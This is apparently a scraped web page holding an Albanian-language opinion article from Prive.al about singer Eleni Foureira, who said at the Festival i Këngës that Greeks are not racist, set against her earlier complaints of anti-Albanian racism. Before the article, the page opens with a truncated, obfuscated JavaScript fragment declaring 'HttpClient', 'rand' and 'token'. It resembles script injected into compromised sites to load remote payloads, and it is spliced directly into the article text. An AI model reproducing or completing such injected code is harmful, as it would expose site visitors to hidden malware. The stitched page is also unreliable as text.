;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Huqja e Eleni: Dikur fshihte etninë shkaku i racizmit, sonte grekët i konsideroi shembull!

By

Eleni Foureira, këngëtarja me origjinë shqiptare performoi sonte në Festivalin e Këngës, siç ishte paralajmëruar.

Ajo interpretoi një kolazh nga repertori i artistëve të tjerë miksuar me disa këngë të saj duke krijuar atmosferë në Pallatin e Kongreseve.

Pas këngës, ajo provoi të flasë shqip, gjë të cilën dinte ta bënte mjaft mirë, përkundër se në vazhdimësi përpiqej të thoshte se gjuhën shqipe nuk e di. Eleni befasoi sepse pak kohë më parë në një koncert në Tiranë dhe intervistat që pasuan fliste vetëm anglisht.

Por, në fjalën e saj sonte një tjetër detaj mori vëmendje.

Teksa shumë shqiptarë vazhdojnë të trajtohen si qytetarë të dorës së tretë e të tjerë vdesin burgjeve të Greqisë, Eleni, e ndihmuar nga Alketa, një pjesë të madhë të kohës ia kushtoi shpërlarjes së imazhit të shtetit helen.

‘Grekët nuk janë racistë. Para së gjithash, janë shumë të sjellshëm dhe ndihmojnë. Janë shumë të sjellshëm. Tani, me gjithë njerëzit nga Siria që po vijnë, Greqia është i vetmi vend që i mban brenda. Nuk i dëbojnë’ – u shpreh Eleni, në kontradiktë të plotë me narrativën e ndërtuar ndër vite nga vetë ajo.

Këngëtarja që mohoi origjinën shqiptare për një kohë të gjatë nën pretekstin se do e pengonte në karrierë shkaku i racizmit, krejt papritmas sonte u shfaq teksa përpiqej të na tregonte se grekët nuk janë racistë.

“Unë kam ndjerë një atmosferë të vazhdueshme racizmi në shkollë dhe më tej kur nisa karrierën time si këngëtare. Detyrohesh të fshehësh seksualitetin tënd, apo kombësinë tënde dhe këto ndodhin. Dhe unë e fsheha faktin se, kam lindur në Shqipëri. E bëra këtë, sepse kur shkoja në fillimet e mia nëpër shtëpitë diskografike, atyre u mjaftonte fakti që të mësonin se isha shqiptare për të më shpërfillur”, – tregonte Eleni në Nëntor të vitit 2014 duke ngritur pikëpyetjen se a kanë ndryshuar grekët apo vetë Eleni për kaq pak kohë.

Sikur të mos mjaftonte deklarata e panevojshme e Eleni sonte, ajo u përkrah edhe nga prezantuesja Vejsiu që ndan mendimin se ‘arti e bën më mirë politikën sesa politikanët’. Ndonëse ndër politikanët shqiptarë vuajmë për ‘kurriz’, nëse artistë të tillë do e merrnin në dorë politikën, atëherë pa dyshim do mund të thonim me plot gojë se epilogu do ishte edhe më katastrofal se ky që kemi sot. /Prive.al

Artikuj të ngjashëm